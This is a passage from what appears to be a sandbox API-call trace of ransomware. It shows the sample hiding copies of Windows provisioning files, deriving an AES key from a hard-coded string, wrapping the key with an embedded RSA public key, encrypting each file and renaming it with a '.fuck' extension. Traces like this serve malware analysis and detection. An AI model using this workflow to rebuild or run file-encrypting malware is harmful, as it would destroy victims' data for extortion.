pInfo=0x29088e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908918*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908920*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e72b8) returned 1 [0240.419] CryptEncrypt (in: hKey=0x28e72b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.419] CryptEncrypt (in: hKey=0x28e72b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7c40*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f7c40*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.419] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7c40, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.420] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.420] CryptEncrypt (in: hKey=0x28e6db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.420] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.420] CloseHandle (hObject=0xffffffff) returned 1 [0240.420] CloseHandle (hObject=0xffffffff) returned 1 [0240.420] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml"), bFailIfExists=0) returned 0 [0240.420] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml", dwFileAttributes=0x0) returned 0 [0240.421] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.gsg")) returned 0 [0240.421] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.fuck")) returned 0 [0240.422] CryptDestroyHash (hHash=0x28e6f78) returned 1 [0240.422] CryptDestroyKey (hKey=0x28e6db8) returned 1 [0240.422] CryptReleaseContext (hProv=0x28f7338, dwFlags=0x0) returned 1 [0240.422] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.422] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.422] GetLastError () returned 0x5 [0240.422] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml")) returned 0x20 [0240.422] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml", dwFileAttributes=0x80) returned 0 [0240.423] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.423] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.423] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.424] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f71a0) returned 1 [0240.426] CryptCreateHash (in: hProv=0x28f71a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.426] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.426] CryptHashData (hHash=0x28e6c38, pbData=0x28cb698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.426] CryptDeriveKey (in: hProv=0x28f71a0, Algid=0x6610, hBaseData=0x28e6c38, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e70f8) returned 1 [0240.427] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.427] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.427] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f72b0) returned 1 [0240.427] CryptImportPublicKeyInfo (in: hCryptProv=0x28f72b0, dwCertEncodingType=0x1, pInfo=0x29089b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29089e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29089f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e6c78) returned 1 [0240.427] CryptEncrypt (in: hKey=0x28e6c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.427] CryptEncrypt (in: hKey=0x28e6c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7ee8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f7ee8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.428] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7ee8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.428] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.428] CryptEncrypt (in: hKey=0x28e70f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.428] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.428] CloseHandle (hObject=0xffffffff) returned 1 [0240.428] CloseHandle (hObject=0xffffffff) returned 1 [0240.428] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml"), bFailIfExists=0) returned 0 [0240.429] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml", dwFileAttributes=0x0) returned 0 [0240.429] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.gsg")) returned 0 [0240.430] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml.fuck")) returned 0 [0240.430] CryptDestroyHash (hHash=0x28e6c38) returned 1 [0240.430] CryptDestroyKey (hKey=0x28e70f8) returned 1 [0240.430] CryptReleaseContext (hProv=0x28f71a0, dwFlags=0x0) returned 1 [0240.430] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.431] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.431] GetLastError () returned 0x5 [0240.431] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml")) returned 0x20 [0240.431] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml", dwFileAttributes=0x80) returned 0 [0240.431] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.432] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.432] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.433] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f7cc8) returned 1 [0240.436] CryptCreateHash (in: hProv=0x28f7cc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.436] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.436] CryptHashData (hHash=0x28e6e38, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.436] CryptDeriveKey (in: hProv=0x28f7cc8, Algid=0x6610, hBaseData=0x28e6e38, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e70f8) returned 1 [0240.436] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.436] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.436] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f7668) returned 1 [0240.437] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7668, dwCertEncodingType=0x1, pInfo=0x2908338*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908368*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908370*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7138) returned 1 [0240.437] CryptEncrypt (in: hKey=0x28e7138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.437] CryptEncrypt (in: hKey=0x28e7138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7ff8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f7ff8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.437] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7ff8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.437] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.437] CryptEncrypt (in: hKey=0x28e70f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.437] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.437] CloseHandle (hObject=0xffffffff) returned 1 [0240.437] CloseHandle (hObject=0xffffffff) returned 1 [0240.438] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml"), bFailIfExists=0) returned 0 [0240.438] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml", dwFileAttributes=0x0) returned 0 [0240.438] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.gsg")) returned 0 [0240.439] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml.fuck")) returned 0 [0240.439] CryptDestroyHash (hHash=0x28e6e38) returned 1 [0240.439] CryptDestroyKey (hKey=0x28e70f8) returned 1 [0240.440] CryptReleaseContext (hProv=0x28f7cc8, dwFlags=0x0) returned 1 [0240.440] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.440] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.440] GetLastError () returned 0x5 [0240.440] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml")) returned 0x20 [0240.440] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml", dwFileAttributes=0x80) returned 0 [0240.440] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.441] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.441] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.442] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f71a0) returned 1 [0240.445] CryptCreateHash (in: hProv=0x28f71a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.445] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.445] CryptHashData (hHash=0x28e6e38, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.445] CryptDeriveKey (in: hProv=0x28f71a0, Algid=0x6610, hBaseData=0x28e6e38, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e6b78) returned 1 [0240.445] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.445] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.445] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f7338) returned 1 [0240.446] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7338, dwCertEncodingType=0x1, pInfo=0x2907ff8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908028*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908030*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e6c38) returned 1 [0240.446] CryptEncrypt (in: hKey=0x28e6c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.446] CryptEncrypt (in: hKey=0x28e6c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7cc8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f7cc8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.446] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7cc8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.446] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.446] CryptEncrypt (in: hKey=0x28e6b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.446] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.446] CloseHandle (hObject=0xffffffff) returned 1 [0240.446] CloseHandle (hObject=0xffffffff) returned 1 [0240.446] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml" (normalized: "c:\\users\\all 